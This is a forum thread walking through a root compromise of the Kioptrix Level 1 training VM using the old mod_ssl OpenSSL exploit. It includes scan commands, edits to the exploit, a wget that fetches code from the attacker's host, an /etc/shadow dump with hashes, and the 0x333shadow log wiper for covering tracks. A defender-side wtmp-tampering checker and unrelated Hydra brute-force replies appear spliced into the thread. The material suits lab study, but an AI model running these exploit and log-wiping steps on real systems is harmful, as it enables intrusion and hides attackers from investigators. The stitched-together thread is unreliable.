Thread: [Video] Kioptrix - Level 1 (mod_ssl)

    #1 - g0tmi1k (Moderator)

    [Video] Kioptrix - Level 1 (mod_ssl)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4845917/
    Download video: http://www.mediafire.com/?r3327dt3re397hb


    Brief Overview
    Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This video demonstrates a well-known out-of-date issue in "mod_ssl". Because it wasn't too complex, I extended the video by removing the attacker from some log files.


    Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Scan target for running web services (nikto)
    * Discover and run exploit (Open****V2)
    * Gain root (Open****V2)
    * Game Over
    * Modify logs (0x333shadow)


    What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5:8DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * nikto - (Can be found on BackTrack 4-R2)
    * Internet Browser – (Firefox can be found on BackTrack 4-R2)
    * A Text Editor – (Kate can be found on BackTrack 4-R2)
    * Open****v2.c – (Can be found on exploit-db.com)
    * ptrace/kmod local root exploit – (Can be found on securityfocus.com)
    * 0x333shadow.tar – (Can be found on packetstormsecurity.org)


    Walkthrough
    A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running, and tries to identify the operating system (OS) and versions. The result of this is:
    * OS: Linux v2.4.x (2.4.9-18)
    * Web Server: Apache httpd 1.3.20 ((Unix) (Red-hat/Linux)) mod_ssl 2.8.4/OpenSSL 0.9.6b

    The next stage was to use nikto to allow the attacker to detect what vulnerabilities were present on the web server. Nikto identifies that the version of mod_ssl is "vulnerable to a remote buffer overflow which may allow a remote shell" [CVE-2002-0082, OSVDB-756].

    The attacker then searches an exploit database (exploit-db.com), which returns a couple of exploits. The chosen exploit was labelled as "Open****V2.c".

    The exploit needed to be modified to compile on the attacker's computer due to updated library files for OpenSSL, as well as updating the link for the privilege escalation exploit.

    After the exploit has been compiled, the attacker looks up the details on the target's environment (from the nmap and nikto scans before) and runs the exploit. After which, not only has the attacker successfully gained a remote shell, the attacker also has "root" access on the target's system.

    As the exploit targets “mod_ssl”, it inherits the same privilege as the user which is running the service (in this case “apache”). If the current privilege isn't enough for the attacker to reach their goal then they must use privilege elevation attacks to gain further access to the system. In most cases, the targeted account would be the highest user, “root”. This would allow the attacker to control anything on the target's system.

    Once the attacker has a remote shell, the next few commands check the objective (which is displayed on the login screen locally) and the local environment as well as the password file.

    The attacker has been using their machine directly, as well as hosting all the necessary files on their machine; therefore, to attempt to cover their traces, they remove their IP address from various locations. This is done by using a program called "0x333shadow".

    The attacker runs 0x333shadow, which removes traces of the attacker's IP in all default log directories and binary files (utmp, wtmp, utmpx, wtmpx, lastlog), as well as scanning “syslog” and “newsyslog” to try and detect other log locations. The attacker commands 0x333shadow to remove the logs 5 seconds after running 0x333shadow, allowing them to remove all traces of the program itself.

    Commands
    Code:
    nmap 192.168.0.0/24 -n -sP -sn 
    nmap 192.168.0.111 -O -sS -sV -v 
    clear 
    
    cd /pentest/scanners/nikto 
    ./nikto.pl -host 192.168.0.111 -Display 124 
    
    Firefox: Search (exploit.db): OpenSSL -> Download 
    #http://www.exploit-db.com/exploits/764/ 
    
    cd ~ 
    gcc 764.c -o exploit -lcrypto 
    kate 764.c 
    -> Add: #include <openssl/rc4.h> 
    -> Add: #include <openssl/md5.h> 
    Firefox: Search (Google): ptrace-kmod.c. Download: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c 
    cp ptrace-kmod.c /var/www/ 
    start-apache 
    -> Replace: wget 192.168.0.33/ptrace-kmod.c 
    -> Save 
    gcc 764.c -o exploit -lcrypto 
    ls 
    ./exploit 
    ./exploit 0x6b 192.168.0.111 443 
    
    uname -a 
    #cat /etc/*-release 
    whoami 
    cat /etc/issue 
    mail 
    1 
    exit 
    
    cat /etc/shadow 
    
    cd /var/log && grep -r 192.168.0.33 ./ 
    Firefox: Google -> Search: 0x333shadow.tar.gz. Download: http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/0x333shadow.tar.gz 
    tar xvf 0x333shadow.tar.gz 
    cd 0x333shadow 
    ls 
    cp 0x333shadow.c /var/www/rmLogs.c
    cd /tmp
    wget 192.168.0.33/rmLogs.c 
    gcc 0x333shadow.c -o rmLogs -D Linux 
    ls 
    ./rmLogs 
    ./rmLogs -a -i 192.168.0.33 -l 5 && rm -rf * 
    locate .bash_history 
    cat /home/john/.bash_history 
    cat /root/.bash_history 
    
    uname -a && whoami 
    
    #--------------------------------------------------------------------- 
    root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7::: 
    john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7::: 
    harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7::: 
    #---------------------------------------------------------------------


    Notes

    * This is a well-known old vulnerability, and has a few different variations on the exploit.
    * Open****V2.c (which uses "ptrace-kmod.c") might not gain "root" if the target doesn't have gcc installed or is not using a vulnerable kernel version.
    * The attacker may be logged by another service, which 0x333shadow might not remove.
    * Just because the logs have been deleted, doesn't mean you have covered all traces. For example, forensics tools can recover deleted files.
    * As the target only communicates with the attacker, instead of via a 3rd party, it helps simplify removing logs.

    Song: Rocco – Everyone 9.0 (Single Mix) & Kompulsor – Around the World (La La La La) (Single Edit)
    Video length: 06:22
    Capture length: 19:31
    Blog Post: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-1-modssl.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38314-%5Bvideo%5D-kioptrix-level-1-mod_ssl.html#post190751


    ~g0tmi1k
    Last edited by g0tmi1k; 03-23-2011 at 10:12 PM.
    Have you...g0tmi1k?
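From the defender's side, the log-wiping step above is the part worth being able to spot. The following is an added example (not code from g0tmi1k's post or from 0x333shadow): it parses binary wtmp records using the glibc struct utmp layout (an assumption about the target's libc) and flags what a wiper typically leaves behind: zeroed records, a clock that runs backwards, and a logout on a tty whose login record has vanished. The sample wtmp bytes are constructed inline.

```python
import struct
from collections import namedtuple

# glibc struct utmp (384 bytes, little-endian), assumed layout: type(2) pad(2)
# pid(4) line[32] id[4] user[32] host[256] exit(2+2) session(4) tv_sec(4)
# tv_usec(4) addr_v6[16] unused[20]
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8
Rec = namedtuple("Rec", "type pid line user host tv_sec")

def _cstr(b: bytes) -> str:
    return b.split(b"\0", 1)[0].decode(errors="replace")

def parse_wtmp(data: bytes) -> list:
    """Decode fixed-size utmp records; a trailing partial record is ignored."""
    recs = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append(Rec(f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5]), f[9]))
    return recs

def find_tampering(recs) -> list:
    """Heuristics for traces a log wiper leaves: an all-zero record, a
    timestamp that goes backwards, and a logout with no preceding login."""
    findings, open_lines, last_ts = [], set(), 0
    for i, r in enumerate(recs):
        if r.type == 0 and r.pid == 0 and r.tv_sec == 0:
            findings.append(f"record {i}: all-zero record (entry overwritten)")
            continue
        if r.tv_sec < last_ts:
            findings.append(f"record {i}: timestamp goes backwards")
        last_ts = max(last_ts, r.tv_sec)
        if r.type == USER_PROCESS:
            open_lines.add(r.line)
        elif r.type == DEAD_PROCESS and r.line:  # boot-time DEAD_PROCESS has an empty line
            if r.line not in open_lines:
                findings.append(f"record {i}: logout on {r.line} with no preceding login")
            open_lines.discard(r.line)
    return findings

def make_rec(type_, pid, line, user, host, tv_sec) -> bytes:
    """Pack one record; struct pads the byte strings with NULs."""
    return struct.pack(UTMP_FMT, type_, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)

# Constructed sample wtmp: a clean session, an orphaned logout, and a zeroed record.
SAMPLE_WTMP = (make_rec(USER_PROCESS, 501, "pts/0", "john", "192.168.0.33", 1000)
               + make_rec(DEAD_PROCESS, 501, "pts/0", "", "", 1100)
               + make_rec(DEAD_PROCESS, 777, "pts/1", "", "", 1200)
               + bytes(UTMP_SIZE))
```

Running `find_tampering(parse_wtmp(open("/var/log/wtmp", "rb").read()))` on a real host applies the same checks; the record size must match that host's libc.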

    #2

    Re: [Video] Kioptrix - Level 1 (mod_ssl)

    Thanks G0tMi1k for the video,

    I have been trying it however, I got first stuck on compiling the Open****V2.c; and your video helped me in solving it. However, when I ran the exploit against the target, it is not always returning the suid shell; which is weird. I tried running the exploit 6 times, and only got the shell once.

    Have you faced such thing? I am using BT4R2...

    Thanks again

    #3 - g0tmi1k (Moderator)

    Re: [Video] Kioptrix - Level 1 (mod_ssl)

    Quote Originally Posted by inrikey:
    nice post thx
    Quote Originally Posted by SaD Hack3r:
    thanks i will try
    Quote Originally Posted by wahran3100:
    thank you for the post .. nice
    Quote Originally Posted by Crypto7:
    thnks man great job ^^
    Thanks for the thanks! Glad to hear some feedback!



    Quote Originally Posted by kataibrengsek:
    I wonder how this script runs?
    I cannot find where I should put the IP or hostname; please tell me how to do it.

    tks
    There isn't a script? I'm not sure what you mean. This is a general breakdown of it:
    Code:
    hydra -l [username] -P [/path/to/wordlists.file] -e ns -t 15 -f -s -vV [hostname/ip] http-get [path]


    Quote Originally Posted by juampix:
    Where can I download the dictionary? The link doesn't work: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Please
    thanks for helping
    Just tested that link, it's working for me!
    You can find some others by searching the forum too.


    Quote Originally Posted by beastlybribo:
    To log onto my router all you need is the password. When I type in

    hydra -p /root/wpa/darkc0de.lst -e ns -t 15 -f -s -vV 192.168.2.1 http-get /

    I get:

    Error: I need at least the -l -L or -C option to know the login

    But my router doesn't have a login, only a password!!

    Please help
    Have you tried setting the username as "anythingyoulike"?
    As it's your router, do a test. Create a small wordlist with the password in the middle somewhere, and see if "-l anythingyoulike" works?
    Have you...g0tmi1k?
